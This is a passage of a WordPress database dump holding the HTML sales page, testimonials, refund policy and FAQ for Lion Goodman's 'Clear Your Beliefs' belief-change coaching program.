hours.)</p>\n<p>&nbsp;</p>\n<h1>About Lion Goodman</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<p><em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em></p>\n<strong>– G. J., software developer</strong>\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em></p>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em></p>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em></p>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em></p>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em></p>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em></p>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em></p>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em></p>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em></p>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em></p>\n<strong>– M.M., International Business Consultant</strong>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center;">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" >ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank" >BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" >ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<p> </p>', 'Clear Your Beliefs Program', '', 'inherit', 'open', 'open', '', '1941-revision-v1', '', '', '2015-05-12 13:18:01', '2015-05-12 18:18:01', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2167, 2, '2015-05-12 12:54:45', '2015-05-12 17:54:45', '&nbsp;\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<p>&nbsp;</p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n&nbsp;\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\nThe best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" />\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n&nbsp;\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.\n\n<strong>We literally create our reality with our beliefs.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong>\n\n<strong>It''s that simple.</strong></p>\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It''s that simple.</strong></p>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n</p>\n<em>\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p><p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n<p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n&nbsp;\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" 